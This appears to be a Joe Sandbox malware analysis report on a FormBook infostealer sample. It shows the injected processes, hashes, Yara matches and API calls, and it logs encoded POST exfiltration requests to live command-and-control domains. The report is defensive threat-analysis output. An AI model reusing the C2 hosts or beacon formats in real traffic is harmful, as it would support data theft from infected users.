gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1804&rtt_var=902&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50013	172.67.169.6	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:21.910578966 CET	1815	OUT	POST /1ag2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.mydreamdeal.click Origin: http://www.mydreamdeal.click Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.mydreamdeal.click/1ag2/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 31 58 70 66 4f 4d 31 67 73 7a 33 47 4f 50 52 41 49 4f 4a 62 41 64 6d 31 73 58 54 59 79 75 37 66 73 6f 6c 79 6a 51 44 51 42 2f 79 62 55 76 76 70 58 66 6f 46 74 76 31 51 61 51 56 78 69 46 31 79 67 37 6a 6a 53 48 66 52 6d 33 4b 51 45 73 6d 78 4c 64 70 74 65 34 37 61 45 44 42 6a 49 54 44 5a 38 71 79 50 38 4b 4f 4c 34 65 41 2f 2b 54 48 72 31 32 2b 37 42 51 51 79 64 65 77 47 32 36 43 49 6f 6f 30 77 75 68 66 69 7a 6f 55 79 75 49 51 76 65 79 49 48 63 4b 32 59 46 56 6b 34 6d 32 65 53 44 37 31 66 77 6d 78 33 38 35 72 63 30 64 35 4b 4e 57 6b 59 43 45 34 4c 32 67 43 53 47 37 79 4d 6c 64 47 34 57 38 59 4a 61 50 36 65 4f 51 6a 38 67 48 65 72 56 50 73 61 74 58 54 76 61 78 48 63 7a 51 33 33 6c 79 49 48 77 72 38 79 57 2b 76 32 55 42 6c 75 55 33 4b 7a 79 4a 63 36 48 42 45 4b 34 6c 2b 6a 5a 68 61 67 35 44 51 68 57 53 4e 57 67 6b 43 43 6b 55 47 62 4d 78 68 52 30 77 49 35 34 65 43 63 6b 77 49 38 5a 39 75 67 48 69 33 35 44 49 75 66 42 70 76 59 48 4e 56 31 6e 7a 69 48 74 31 66 4a 66 76 37 56 5a [TRUNCATED] Data Ascii: QtKtUpvP=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/ybUvvpXfoFtv1QaQVxiF1yg7jjSHfRm3KQEsmxLdpte47aEDBjITDZ8qyP8KOL4eA/+THr12+7BQQydewG26CIoo0wuhfizoUyuIQveyIHcK2YFVk4m2eSD71fwmx385rc0d5KNWkYCE4L2gCSG7yMldG4W8YJaP6eOQj8gHerVPsatXTvaxHczQ33lyIHwr8yW+v2UBluU3KzyJc6HBEK4l+jZhag5DQhWSNWgkCCkUGbMxhR0wI54eCckwI8Z9ugHi35DIufBpvYHNV1nziHt1fJfv7VZlPbN7Ssw+UO7tJG1XBT6f5qqWq6AxBc+DP1MNcCEIYx4zIBVsm0jXRmckcprDsnK/OORrgOGOgC1sbmDi1JK6PF7eU3WrIDtJ/yFwuU9iExGYTGj1lsbgNm2rKiRv0qeHqbdcoDDTxSfEDWdju9v3G6mKnGaa3uT+CtZpEcrrS/daNTce7ZXN0UZW9IiJM0AbesrFJAmBAbdN6S8YdQXkGYsM4GvWhMCcscgB+7gufad2wmsTp+KzKzF4MOk9F0VZgb4PlJN+08Ffy0UCbaoIrzvXme67r9PxbIOMusBUBPON6dpMwLaubgns/Ezbp0hghxm6S+8+xCyoQ0Rma30FMSWzr3YX2nYYXDKBG5En/1dVnmTIFf5Jei6RvIeLiTvb43jZdQhVyFJqS62DatI3tv11bNd5qA0gy+58ODD6RqPGykudfifcz5vf+j9crJrhFrT927scdSsJzEpcE3wNjrr+pmXcXbaCAXOgAAiRGqQrXoY+Wu0gGGFbiMyera4jWf+04oNcOJfNQtWabbkDZtocBtB30V3OvscAtzeCsv7xDOjTHpsU8wMeK6J7NehHRdMe+RDVG1x78IMZzzjBUT3Sq4y7wMnmDSGkGxkSkDVPHRXISr0TSblsF4xZ3llu0NjjLHowVz8pWniVBpGxT9JeGsxD1VhQh [TRUNCATED]
Nov 29, 2024 03:55:23.159331083 CET	1071	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:55:22 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Fri, 29 Nov 2024 02:55:22 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Li5Ec%2Fm7NNYDKDwvterOOURG%2F6ihWFaWzfeJBGkyKw8WAbJEUr0p27ClgQMk0v5DTyIWt3Ql0PXf71qwOcBRPi0IfE1Q%2FuO971LIRYzRnHEcLWlIKF%2FYNSOPKY1Nts6ugU6WUaOXpuo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f518709127c9c-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1815&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50014	172.67.169.6	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:24.579932928 CET	513	OUT	GET /1ag2/?QtKtUpvP=4VB/N4F6tibqC9FTErplINOthlfgxvKF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxY86kHntrUB3V3amez42c7fYExSv8wX62GyA3d/Me6afi2Q==&tz=vf30S8fHB HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.mydreamdeal.click Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
Nov 29, 2024 03:55:25.991354942 CET	1070	IN	HTTP/1.1 404 Not Found Date: Fri, 29 Nov 2024 02:55:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Expires: Fri, 29 Nov 2024 02:55:25 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V28c3z12%2BSNBmS2bFzgxHBUo%2B4dlRUFWqRZaKAgwXQw44FPTmFR8LD940iCWJl0SWy%2FyVzDOk3%2B0oJIXCkIhLY9Qt6z%2F81YOtF6FNsyINk%2FOQGpnrU5qZRIu3D2IUUKKYMQo29mzSKM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e9f519899af8ca7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1802&rtt_var=901&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=513&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50015	194.245.148.189	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:31.763650894 CET	781	OUT	POST /dvmh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.maitreyatoys.world Origin: http://www.maitreyatoys.world Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 209 Connection: close Referer: http://www.maitreyatoys.world/dvmh/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 43 4a 63 67 76 59 4c 67 53 6e 35 33 65 64 43 71 36 64 63 46 5a 30 61 57 7a 32 7a 73 71 46 42 2b 67 45 4b 43 70 6f 76 6e 33 31 4d 5a 69 79 34 74 6f 55 73 58 50 6b 62 54 2b 4c 35 57 59 68 67 35 45 6e 54 5a 44 34 32 5a 49 57 36 79 39 72 67 6e 46 62 53 68 6d 52 65 2f 59 6e 2b 61 52 66 4e 44 52 46 73 5a 77 46 30 68 64 56 48 52 61 33 4b 71 68 6c 31 69 74 4f 4a 76 64 68 71 56 58 6d 57 74 39 56 4c 33 2b 69 55 4e 31 32 42 2b 45 70 6d 57 4a 4d 4f 33 78 53 56 4c 39 5a 7a 73 55 4d 64 2f 73 65 58 4f 78 61 51 42 63 49 4f 53 39 38 67 37 59 49 54 56 63 47 73 42 78 32 34 3d Data Ascii: QtKtUpvP=lHgkb+a8mCncCJcgvYLgSn53edCq6dcFZ0aWz2zsqFB+gEKCpovn31MZiy4toUsXPkbT+L5WYhg5EnTZD42ZIW6y9rgnFbShmRe/Yn+aRfNDRFsZwF0hdVHRa3Kqhl1itOJvdhqVXmWt9VL3+iUN12B+EpmWJMO3xSVL9ZzsUMd/seXOxaQBcIOS98g7YITVcGsBx24=
Nov 29, 2024 03:55:33.056523085 CET	322	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 29 Nov 2024 02:55:32 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50016	194.245.148.189	80	3948	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:34.426805973 CET	801	OUT	POST /dvmh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.maitreyatoys.world Origin: http://www.maitreyatoys.world Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 229 Connection: close Referer: http://www.maitreyatoys.world/dvmh/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 44 6f 73 67 70 2f 66 67 46 58 35 6f 62 64 43 71 31 39 63 42 5a 30 6d 57 7a 33 33 38 71 77 78 2b 68 6c 36 43 6d 4a 76 6e 30 31 4d 5a 70 53 34 30 31 45 74 36 50 6b 6d 67 2b 4f 35 57 59 68 30 35 45 6d 6a 5a 44 76 69 61 4a 47 36 30 32 4c 67 66 4c 37 53 68 6d 52 65 2f 59 6b 43 38 52 66 31 44 51 32 6b 5a 77 6e 4d 67 58 31 48 65 4d 6e 4b 71 79 31 31 6d 74 4f 49 36 64 67 47 2f 58 6b 75 74 39 56 62 33 2b 77 73 53 6d 57 42 38 41 70 6e 76 4b 65 75 6e 30 45 45 46 33 34 75 65 4e 73 49 4c 67 49 6d 6b 72 34 59 70 50 6f 69 71 74 76 6f 4d 4a 34 79 38 47 6c 38 78 76 68 74 66 44 4b 7a 63 55 4f 74 73 41 42 44 74 47 43 31 75 6d 6c 43 65 Data Ascii: QtKtUpvP=lHgkb+a8mCncDosgp/fgFX5obdCq19cBZ0mWz338qwx+hl6CmJvn01MZpS401Et6Pkmg+O5WYh05EmjZDviaJG602LgfL7ShmRe/YkC8Rf1DQ2kZwnMgX1HeMnKqy11mtOI6dgG/Xkut9Vb3+wsSmWB8ApnvKeun0EEF34ueNsILgImkr4YpPoiqtvoMJ4y8Gl8xvhtfDKzcUOtsABDtGC1umlCe
Nov 29, 2024 03:55:35.717648029 CET	322	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Fri, 29 Nov 2024 02:55:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.5	50017	194.245.148.189	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 03:55:37.395771980 CET	1818	OUT	POST /dvmh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Host: www.maitreyatoys.world Origin: http://www.maitreyatoys.world Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Connection: close Referer: http://www.maitreyatoys.world/dvmh/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko Data Raw: 51 74 4b 74 55 70 76 50 3d 6c 48 67 6b 62 2b 61 38 6d 43 6e 63 44 6f 73 67 70 2f 66 67 46 58 35 6f 62 64 43 71 31 39 63 42 5a 30 6d 57 7a 33 33 38 71 77 35 2b 67 54 6d 43 6e 71 48 6e 31 31 4d 5a 79 79 34 70 31 45 74 43 50 6b 2b 73 2b 4f 39 47 59 6a 4d 35 45 45 72 5a 55 4f 69 61 51 32 36 30 35 72 67 6b 46 62 53 30 6d 51 75 7a 59 6b 53 38 52 66 31 44 51 32 49 5a 32 31 30 67 52 31 48 52 61 33 4b 75 68 6c 31 4f 74 4e 34 71 64 67 7a 49 58 58 6d 74 39 30 72 33 79 6a 55 53 38 57 42 79 48 70 6e 65 4b 65 6a 67 30 41 64 30 33 34 61 30 4e 75 59 4c 6a 5a 2f 61 76 5a 77 6a 62 34 75 36 6d 6f 67 51 62 34 71 69 4c 6b 30 6a 73 69 5a 4e 45 49 72 79 66 36 45 76 4d 69 79 6c 59 6c 35 57 33 69 62 4a 67 57 6e 51 79 30 6c 6a 79 45 6a 67 49 39 4c 54 6c 6a 4c 64 43 48 4a 33 71 51 4e 6b 41 65 69 63 56 56 51 6d 39 79 42 2b 6c 75 4e 53 62 57 73 4d 73 5a 4c 58 6b 66 64 52 6f 48 6c 58 64 61 2b 5a 63 4f 6b 44 74 37 65 47 6f 6a 5a 5a 4f 41 6a 56 58 54 7a 2b 49 31 56 43 54 76 59 49 65 6a 65 4e 76 47 31 32 51 50 4b 44 6e 4e 37 43 7a [TRUNCATED] Data Ascii: QtKtUpvP=lHgkb+a8mCncDosgp/fgFX5obdCq19cBZ0mWz338qw5+gTmCnqHn11MZyy4p1EtCPk+s+O9GYjM5EErZUOiaQ2605rgkFbS0mQuzYkS8Rf1DQ2IZ210gR1HRa3Kuhl1OtN4qdgzIXXmt90r3yjUS8WByHpneKejg0Ad034a0NuYLjZ/avZwjb4u6mogQb4qiLk0jsiZNEIryf6EvMiylYl5W3ibJgWnQy0ljyEjgI9LTljLdCHJ3qQNkAeicVVQm9yB+luNSbWsMsZLXkfdRoHlXda+ZcOkDt7eGojZZOAjVXTz+I1VCTvYIejeNvG12QPKDnN7CzUx/J+IICRvbOSBEfFPSqSDpL8dG9iTSjfV4GJ2s6smtyPz/BzWdCcQXBE8k2z5iP2xpiEK4ffoecPKKGlOvrRUnORZRc5d6RwNMLT876mcnCuu8UMSezc5zu9PTNon+mVfd94v5Nzu0gO1vM16M323cl699UGgtUPVRauPKFgj60cFoV4XDA8dHKQ9VakqkaJXGG9xwJLuA85tYI7fa/MszWgIu5PxL5r5xztgQQKs+zV5uNG06LtjSE49dY63c8YKDx+AYfbiTLcg6GDvza0uEDxIEerIE8zLZAflpaSKQ+oGtSwIlM9EQkQle9SZsJnwK+pScDD8S1/0WR8E6vZN0mJTlt45XeHqhFQ0tE9adSMU5WyK2nfyNLipCgfBzzts7Z71m+PQspQduKkwCLWxWqTUuF9B8+g4/+tRl3n8pyKmawTOPodinr1g/4BWxoC2RnA1+jhe6lZFjFLXIvhqEHc5R/nMNO9GvQsv2D9BacysPXkYcOtw6pw1bWe7kjMPzypUmgD0m6SJKITU6CCbzUCQGk9iCbvIIO//n7/PrF2ymvB5erwGXe2nYonu80OO4vXTQbD10OoJnetT60v9ZpZoGg63psfZMFfMasQwnTVhf2W/OvtRH9SonRkMw3fYriY6jo3jYs0o3sSzS0f2mXDbKTegMkDK [TRUNCATED]

Target ID:	0
Start time:	21:52:29
Start date:	28/11/2024
Path:	C:\Users\user\Desktop\A2028041200SD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\A2028041200SD.exe"
Imagebase:	0xfe0000
File size:	1'223'680 bytes
MD5 hash:	2902D8F9BC667F82A0BB441F3C4DAE1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:52:30
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\A2028041200SD.exe"
Imagebase:	0x20000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2131899884.0000000003320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2131524712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2132464837.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:52:33
Start date:	28/11/2024
Path:	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe"
Imagebase:	0xa80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3878239458.0000000002E40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	21:52:35
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\winrs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\winrs.exe"
Imagebase:	0x120000
File size:	43'008 bytes
MD5 hash:	E6C1CE56E6729A0B077C0F2384726B30
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3877193379.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3878300512.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3878218687.0000000003100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	21:52:47
Start date:	28/11/2024
Path:	C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MjcmUlwKPPukkTgHirMKJOzkqfgkFObYnkMVoZMnUL\ohrkzzHWPesnQB.exe"
Imagebase:	0xa80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3879766244.0000000005440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	21:52:59
Start date:	28/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	1.5%
Signature Coverage:	6.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	72

Executed Functions

Function 0100B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341b569930b3b2b390d6bc0fef59871d7c4363cf811046a79c84f7e384fb1e05
Instruction ID: 7a4a64351e4fdf20f35427cf889d73ed20a815135056c06bc7b1815b8cd773ad
Opcode Fuzzy Hash: 341b569930b3b2b390d6bc0fef59871d7c4363cf811046a79c84f7e384fb1e05
Instruction Fuzzy Hash: CB325079B022198FEB268F58DC406E9B7F5FF46310F4841D9E48AA7A84D7349E81CF52

Function 00FE3D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00FE3AA3,?), ref: 00FE3D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00FE3AA3,?), ref: 00FE3D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,010A1148,010A1130,?,?,?,?,00FE3AA3,?), ref: 00FE3DC8

Part of subcall function 00FE6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FE3DEE,010A1148,?,?,?,?,?,00FE3AA3,?), ref: 00FE6471

SetCurrentDirectoryW.KERNEL32(?,?,?,00FE3AA3,?), ref: 00FE3E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010928F4,00000010), ref: 01051CCE
SetCurrentDirectoryW.KERNEL32(?,010A1148,?,?,?,?,?,00FE3AA3,?), ref: 01051D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0107DAB4,010A1148,?,?,?,?,?,00FE3AA3,?), ref: 01051D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00FE3AA3), ref: 01051D90

Part of subcall function 00FE3E6E: GetSysColorBrush.USER32(0000000F), ref: 00FE3E79
Part of subcall function 00FE3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00FE3E88
Part of subcall function 00FE3E6E: LoadIconW.USER32(00000063), ref: 00FE3E9E
Part of subcall function 00FE3E6E: LoadIconW.USER32(000000A4), ref: 00FE3EB0
Part of subcall function 00FE3E6E: LoadIconW.USER32(000000A2), ref: 00FE3EC2
Part of subcall function 00FE3E6E: RegisterClassExW.USER32(?), ref: 00FE3F30

